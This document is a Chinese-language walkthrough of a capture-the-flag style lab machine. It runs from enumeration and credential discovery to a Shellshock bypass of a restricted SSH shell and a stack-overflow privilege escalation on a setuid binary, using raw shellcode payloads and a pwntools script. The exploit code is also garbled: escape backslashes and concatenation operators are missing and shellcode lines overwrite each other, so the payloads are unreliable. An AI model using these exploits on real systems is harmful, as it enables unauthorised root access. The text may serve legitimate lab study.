首先扫描端口
扫目录,发现了这些东西,去访问一下
robots.txt 中有很多目录
去访问了一下,在
dont_bother keep_trying noob ok_this_is_it
这四个目录下有图片,下载下来,发现 dont_bother 跟其他图片的 md5 不一样
用 winhex 看,最后有一行 Look Deep within y0ur_self for the answer
去访问一下,得到一个文件
文件中是一些 base64 编码后的东西
写个小脚本转一下
代码语言:javascript复制import base64
file = open('./flag.txt','r')
lines = file.readlines()
new=[]
for line in lines:
line=base64.b64decode(line)
new.append(line)
file_out=open('./flag_out.txt','w')
for line1 in new:
file_out.writelines(line1)
file_out.close()
代码语言:javascript复制
用 ftp 协议去访问一下,使用 Tr0ll:Tr0ll 登录成功
下载下来,用刚才拿到的字典跑一下,瞬间出结果:
ItCantReallyBeThisEasyRightLOL
用 winhex 打开压缩包里的文件,看上去是私钥
尝试去登陆 ssh -i noob noob@192.168.149.192
-i 是指定密钥的,我猜用户名就是 noob
但是提示说权限有问题?
说是我这个密钥权限太高了,那就改的小一点,wsl 改不了 windows 正常目录下的文件权限,拷到 wsl 自己的目录下改权限再试
用这种方式绕过:
代码语言:javascript复制ssh -i noob noob@192.168.149.192 '() { :;}; /bin/bash'
代码语言:javascript复制
再用 python 弄个好看点的
代码语言:javascript复制python -c 'import pty; pty.spawn("/bin/bash")'
嗷,涨知识了
在 /nothing_to_see_here/choose_wisely 中每个文件夹有二进制文件,都有 s 的权限
啊我吐了,nc 也不能用,git 也没有
执行第一个给我退出来了
试了一下第二个进入了困难模式??
第三个貌似是栈溢出
cyclic 算出偏移
过了一会文件又没了去了 door2... 被作者玩弄于股掌之间
代码语言:javascript复制./r00t $(python -c "print 'A' * 268 'x80xfbxffxbf' 'a' * 16 'xbaxa0x7bx18x95xdbxcdxd9x74x24xf4x58x33xc9xb1x0bx31x50x15x83xe8xfcx03x50x11xe2x55x11x13xcdx0cxb4x45x85x03x5ax03xb2x33xb3x60x55xc3xa3xa9xc7xaax5dx3fxe4x7ex4ax37xebx7ex8ax67x89x17xe4x58x3ex8fxf8xf1x93xc6x18x30x93'")
就先拿大佬们的 payload 来打了,突然发现在这种情况先我都不知道咋分析,不知所措
我想把这个靶机的内容给提出来,直接拷到 /var/www 目录下,浏览器访问下载下来
后来在本地做的
代码语言:javascript复制from pwn import *
shellcode = "x31xc9xf7xe1x51x68x2fx2fx73"
shellcode = "x68x68x2fx62x69x6ex89xe3xb0"
shellcode = "x0bxcdx80"
payload=shellcode 'a'*(268-len(shellcode)) 'xc0xd3xffxff'
print payload